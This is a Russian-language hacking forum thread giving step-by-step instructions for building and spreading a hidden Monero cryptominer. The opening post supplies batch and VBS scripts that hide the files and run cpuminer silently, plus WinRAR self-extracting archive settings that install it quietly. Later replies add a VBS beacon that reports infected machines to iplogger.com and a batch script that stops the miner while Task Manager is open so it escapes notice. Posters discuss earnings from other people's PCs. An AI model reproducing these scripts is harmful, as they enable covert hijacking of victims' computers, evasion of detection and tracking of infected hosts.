Делаем скрытый майнер (скрытие из диспетчера, ip logger)

Тема в разделе "Майнеры", создана пользователем Resolution, 23.07.2017.

  1. Resolution
    Resolution

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    27.05.2017
    Сообщения:
    45
    Репутация:
    +17 / -0
    Скрытый майнер из подручной хуйни и батиных трав

    Первое что нам нужно - исходники. Качаем архив и находим следующие файлы:

    libcrypto-1.0.0.dll
    libcurl-4.dll
    libgcc_s_seh-1.dll
    libjansson-4.dll
    libssl-1.0.0.dll
    libstdc++-6.dll
    libwinpthread-1.dll
    libz-1.dll
    cpuminer-SSE2.exe (переименуем на cpuminer.exe)


    Скачать: Что бы посмотреть ссылку войдите или зарегистрируйтесь

    Создаем новую папку и кидаем туда эти файлы

    Далее создаем батник для скрытия файлов и запуска майнера (cpu.bat):

    Код:
    attrib +h +r +s /S /D *.*
    set /a cpu=%NUMBER_OF_PROCESSORS%/2
    cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u %Ваша почта% -p x -t %cpu%
    set /a cpu=%NUMBER_OF_PROCESSORS%/2 - работа на половине cpu
    set /a cpu=%NUMBER_OF_PROCESSORS%-1 - работа на всех cpu за исключением одного

    Скрипт на
    vbs для скрытого запуска батника (cpu.vbs):
    Код:
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run chr(34) & C:\ProgramData\Windows\cpu.bat" & Chr(34), 0
    Set WshShell = Nothing
    Теперь - батник для сокрытия cpuminer.exe из
    Диспетчера (поддерживаются Win 8 и старше), ProcessHacker, ProcessExplorer (Explorer.bat):



    Создадим vbs для скрытого запуска Explorer.bat (Explorer.vbs):
    Код:
    [CODE]Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run chr(34) & "C:\ProgramData\Windows\Explorer.bat" & Chr(34), 0
    Set WshShell = Nothing
    И так, у нас есть:

    cpu.bat - запуск майнера
    cpu.vbs - скрытый запуск cpu.bat
    Explorer.bat - сокрытие из диспетчера
    Explorer.vbs - скрытый запуск Explorer.bat
    libcrypto-1.0.0.dll

    libcurl-4.dll
    libgcc_s_seh-1.dll
    libjansson-4.dll
    libssl-1.0.0.dll
    libstdc++-6.dll
    libwinpthread-1.dll
    libz-1.dll
    cpuminer.exe

    Выделяем файл и клацаем
    создать архив.
    В параметрах архива ставим галку
    SFX архив, метод сжатия - максимальный.
    Можно добавить иконку. Идем в
    параметры SFX => Текст и графика => Загрузить значёк SFX из файла. Выбираем иконку с расширением .ico.
    Переходим во вкладку комментарий. Вставляем это:
    Код:
    Path=C:\ProgramData\Windows
    Setup=Explorer.vbs
    Silent=1
    Overwrite=1
    Update=U
    Shortcut=T, "Explorer.vbs", , , Explorer.lnk, 
    И создаем архив. В принципе все.

    Еще пара скриптов от меня (
    vbs)

    Ошибка:


    Ip logger:
     
    Последнее редактирование: 23.07.2017
    • Нравится Нравится x 9
  2. raul
    raul

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    25.10.2016
    Сообщения:
    128
    Репутация:
    +32 / -0
    нормуль. только если на пк будут avx инструкции не заработает же:Boast
     
  3. Resolution
    Resolution

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    27.05.2017
    Сообщения:
    45
    Репутация:
    +17 / -0
    Можешь свой поставить
     
  4. Retro000
    Retro000

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    06.09.2017
    Сообщения:
    1
    Репутация:
    +0 / -0
    Мб лучше собрать его через SIM ?
     
  5. Vlean
    Vlean

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    02.01.2017
    Сообщения:
    277
    Репутация:
    +85 / -0
    Много ли всё это приносит
     
  6. Resolution
    Resolution

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    27.05.2017
    Сообщения:
    45
    Репутация:
    +17 / -0
    Ды как хош
    От количества пк зависит
    С 15 компов где то по 1$ в сутки
    Норвегам с нулевой репой личный не даю!
     
  7. DoMiNaTe
    DoMiNaTe

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    01.09.2017
    Сообщения:
    1
    Репутация:
    +0 / -0
    Ребята помогайте, спалил клиента планш за 55к подключив 12V, реболу не подлежит(уже пытались)
    клиент трясет, денег столько нет, уже полез смотреть из "чего" сделать их, если можно, хотел бы увидеть что под хайдом, или другой какой мож майнер. можно в пм.
    Или если можете подкинте пару идей(схемany) хотя бы каких нибудь стоящий.
    Думаю мои знания для вас будут малы, что бы чем то вам помочь, если только что в моих силах(знаниях)
    Ьзлзы бщжвёщлхкш из коюёщё, зъмрвлхкш жмажфё жщыфдщё, к ызбёзажзклхч эщехжюгсюг кзыёюклжзг рюклжзг йщъзлф. Изёзьвлю ыфдймлвлхкш ы авбжв люё длз ы цлзё жмаэщюлкшrot23
    P.S. Каждый учится и делает ошибки, и делая ошибки мы учимся, с кем не бывает, но не приятно так получилось
    В долгу оставаться не люблю, отблагодарю с первого(хоть каждого) профита
    P.P.S хром даже первый фаил блочит Bin_1_7_4_2.zip. KIS KTS тоже.
     
  8. SnIpErFaN
    SnIpErFaN

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    25.08.2016
    Сообщения:
    124
    Репутация:
    +58 / -1
    Ты не объяснил что нужно прописать в данной вкладке : Winrar(создание архива) => Установка => Параметры установки => Выполнить до и после распаковки.

    И ещё , как склеить ещё этих 2 скрипта в уже созданный выше майнер
     
  9. Resolution
    Resolution

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    27.05.2017
    Сообщения:
    45
    Репутация:
    +17 / -0
    Защита от дурака
     
  10. 101nts
    101nts

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    30.08.2017
    Сообщения:
    1
    Репутация:
    +0 / -0
    Скрипт для Ip logger если надо кому.
    Код:
    GetUrlData "https://iplogger.com/ваш id"
    
    Function GetUrlData(sUrl)
        Dim oHttp
        Set oHttp = CreateObject("MSXML2.ServerXMLHTTP")
        oHttp.setTimeouts 0, 0, 0, 0
      
        oHttp.Open "GET", sUrl, False
        oHttp.send
        GetUrlData = oHttp.responseText
        Set oHttp = Nothing
    End Function
     
    Последнее редактирование: 12.10.2017
  11. Ç▲╟l╟l▲ᗾ|Š
    Ç▲╟l╟l▲ᗾ|Š

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    25.06.2017
    Сообщения:
    58
    Репутация:
    +19 / -0
    Всё чётко, лайк.
    Только вот ошибка в коде cpu.vbs, кавычку пропустил:
    Код:
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run chr(34) & "C:\ProgramData\Windows\cpu.bat" & Chr(34), 0
    Set WshShell = Nothing
    Хотя там кавычки по сути и не нужны.
    Завтра проверю на дедиках.
     
  12. n3und3r
    n3und3r

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    26.07.2016
    Сообщения:
    187
    Репутация:
    +40 / -19
    в чем проблема?
     

    Вложения:

  13. SnIpErFaN
    SnIpErFaN

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    25.08.2016
    Сообщения:
    124
    Репутация:
    +58 / -1
    Код эксплорер.вбс покажи
     
  14. n3und3r
    n3und3r

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    26.07.2016
    Сообщения:
    187
    Репутация:
    +40 / -19
    всё написано так как в мануале
    хз в чем проблема

    я уже не интересуюсь именно этим способом)
     
  15. finkOS
    finkOS

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    20.12.2016
    Сообщения:
    48
    Репутация:
    +5 / -0
    Дайте плз личный со всем скрытым контентом, буду очень благодарен.
     
  16. kalijack
    kalijack

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    10.12.2017
    Сообщения:
    9
    Репутация:
    +0 / -0
    Дружище если скинули, перешли плиз, буду премного благодарен
     
  17. finkOS
    finkOS

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    20.12.2016
    Сообщения:
    48
    Репутация:
    +5 / -0
    Еще не скидывали.
     
  18. N_E_X_T
    N_E_X_T

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    24.11.2017
    Сообщения:
    25
    Репутация:
    +3 / -0
    TIMEOUT /T 5
    set process1=taskmgr.exe
    set process2=5.exe //название вашего процесс.. майнера
    set start=C:\5\start.bat //конфиг запуска.

    tasklist /FI "ImageName EQ %process2%" | find /I "%process2%"
    If %errorlevel% NEQ 1 goto :ex
    :one
    TIMEOUT /T 2
    tasklist /FI "ImageName EQ %process1%" | find /I "%process1%"
    If %errorlevel% NEQ 0 goto :one
    taskkill /f /im %process2%
    :one
    tasklist /FI "ImageName EQ %process2%" | find /I "%process2%"
    If %errorlevel% NEQ 1 goto :one

    :go
    TIMEOUT /T 3
    tasklist /FI "ImageName EQ %process1%" | find /I "%process1%"
    If %errorlevel% NEQ 1 goto :go
    start %start%
    goto :one
    :ex
    exit

    Вот вам батник, который скрывает ваш майнер при открытии диспетчера задач и снова запускает при закрытии...
    ----------------------------------------------------------------------
    Вот vbs на отстук на иплоггер

    On Error Resume Next
    Set m = CreateObject("WinHttp.WinHttpRequest.5.1")
    m.Open "GET", "Что бы посмотреть ссылку войдите или зарегистрируйтесь",0
    m.send
    -----------------------------------------------------------------------
    Что вам еще бросить?:Biggrin
     
  19. finkOS
    finkOS

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    20.12.2016
    Сообщения:
    48
    Репутация:
    +5 / -0
    Этого достаточно, с остальным должен сам разобраться, наверное :) Очень благодарен.
     
  20. N_E_X_T
    N_E_X_T

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    24.11.2017
    Сообщения:
    25
    Репутация:
    +3 / -0
    Всегда пожалуйста! И да...всего-то нужно скачать было несколько паблик майнеров и их разобрать и там нашли б эти коды.:Mail1